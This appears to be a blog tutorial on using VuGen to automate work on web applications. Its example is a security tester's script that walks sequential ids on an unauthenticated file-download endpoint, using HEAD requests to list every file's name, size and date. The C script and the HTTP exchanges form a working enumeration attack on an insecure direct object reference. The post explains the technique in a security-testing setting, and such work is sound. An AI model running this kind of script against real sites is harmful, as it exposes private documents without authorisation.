Harvesting file names with VuGen
VuGen isn’t just a tool for load testing and application monitoring; it can be used to automate any repetitive task on a web application.
In this example, a JDS web security expert found that a page on a content-managed website allowed anyone to request any file in the database (http://www.example.com/FileViewer/getFile.do?id=1449).
It was easy to create a simple VuGen script to compile a list of all the files in the database.
The HTTP request looked like…
```
GET /FileViewer/getFile.do?id=1449 HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 3.5.30729)
Host: www.example.com
Connection: Keep-Alive
```
The following HTTP response was returned…
```
HTTP/1.1 200 OK
Content-Length: 1777617
Cache-Control: private
Content-Disposition: download;filename="MBS Axapta V3.0 - Advanced Finance.pdf";
Content-Type: application/pdf
Set-Cookie: JSESSIONID=8a4d179c30da5e59; path=/FileViewer
Connection: Keep-Alive
Keep-Alive: timeout=7, max=999
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Wed, 16 Aug 2006 03:19:45 GMT
Date: Tue, 13 Jan 2009 00:03:54 GMT
Content-Location: http://www.example.com/FileViewer/WEB-INF/jsps/components/getFile.jsp

%PDF-1.3
%\xE2\xE3\xCF\xD3
758 0 obj
<< /Linearized 1

(the rest of the PDF content in the HTTP response body has been removed)
```
As the file name, file size and last-modified date were all available in the HTTP response headers, it was not necessary to download each file to compile a list of file names. We can use the HTTP HEAD method instead of GET, which returns the same headers without the response body.
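Values like these can be picked out of the header text by the strings on either side of them. As a rough illustration of that idea, here is a minimal sketch in plain C. The function name `extract_between` is hypothetical and is not part of VuGen; it only shows the left-boundary/right-boundary technique on a header string held in memory.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not a VuGen function): copy the text found between
 * the first occurrence of `left` and the next occurrence of `right` into
 * `out`. Returns 0 on success, or -1 if either boundary is missing or the
 * value does not fit in `out`. */
int extract_between(const char *text, const char *left, const char *right,
                    char *out, size_t out_size)
{
    const char *start;
    const char *end;
    size_t len;

    /* Find the left boundary and step past it. */
    start = strstr(text, left);
    if (start == NULL)
        return -1;
    start += strlen(left);

    /* Find the right boundary after the left one. */
    end = strstr(start, right);
    if (end == NULL)
        return -1;

    /* Make sure the value plus its terminator fits in the buffer. */
    len = (size_t)(end - start);
    if (len + 1 > out_size)
        return -1;

    memcpy(out, start, len);
    out[len] = '\0';
    return 0;
}
```

Called with the left boundary `Content-Length: ` and the right boundary `\r\n` on the response headers shown earlier, this would copy `1777617` into the output buffer.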
Here is the VuGen script that, after 10,000 iterations, saved the information about all the files in the content management system.
```c
Action()
{
    char* file = "C:\\TEMP\\content_management_files.txt";

    // Capture the file name, size and date from the response headers
    web_reg_save_param("FileName",
        "LB=Content-Disposition: download;filename=\"",
        "RB=\";",
        "Search=Headers",
        "NotFound=Warning",
        LAST);

    web_reg_save_param("FileSize",
        "LB=Content-Length: ",
        "RB=\r\n",
        "Search=Headers",
        "NotFound=Warning",
        LAST);

    web_reg_save_param("FileDate",
        "LB=Last-Modified: ",
        "RB=\r\n",
        "Search=Headers",
        "NotFound=Warning",
        LAST);

    // {IterationNumber} is assumed to be an Iteration Number parameter
    // defined in the script's parameter list
    web_custom_request("getFile.do",
        "URL=http://www.example.com/FileViewer/getFile.do?id={IterationNumber}",
        "Method=HEAD",
        "Resource=1",
        "Referer=",
        "Snapshot=t1.inf",
        LAST);

    // Only save info for valid files
    // (jds_append_to_file is a custom helper; its source is not shown here)
    if (web_get_int_property(HTTP_INFO_RETURN_CODE) == 200) {
        jds_append_to_file(file, lr_eval_string("{IterationNumber}\t{FileSize}\t{FileDate}\t{FileName}\n"));
    }

    return 0;
}
```
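The script calls `jds_append_to_file`, which is not a built-in VuGen function and whose source is not shown here. A minimal sketch of what such a helper might look like in standard C follows. The body, the `const` parameters and the return convention are all assumptions based only on how the function is called above, not the original implementation.

```c
#include <stdio.h>

/* Hypothetical stand-in for jds_append_to_file(): append `text` to the
 * file at `path`, creating the file if it does not exist yet.
 * Returns 0 on success, -1 on failure. */
int jds_append_to_file(const char *path, const char *text)
{
    FILE *fp;
    int failed;

    /* "a" opens for appending and creates the file if it is absent. */
    fp = fopen(path, "a");
    if (fp == NULL)
        return -1;

    failed = (fputs(text, fp) == EOF);

    /* Closing flushes the buffer, so a failed close also counts. */
    if (fclose(fp) != 0)
        failed = 1;

    return failed ? -1 : 0;
}
```

Opening and closing the file on every call is slow but keeps the output file complete if a run is stopped partway through. Inside VuGen the declarations may need adjusting, since its C interpreter does not necessarily expose the standard headers the way a normal compiler does.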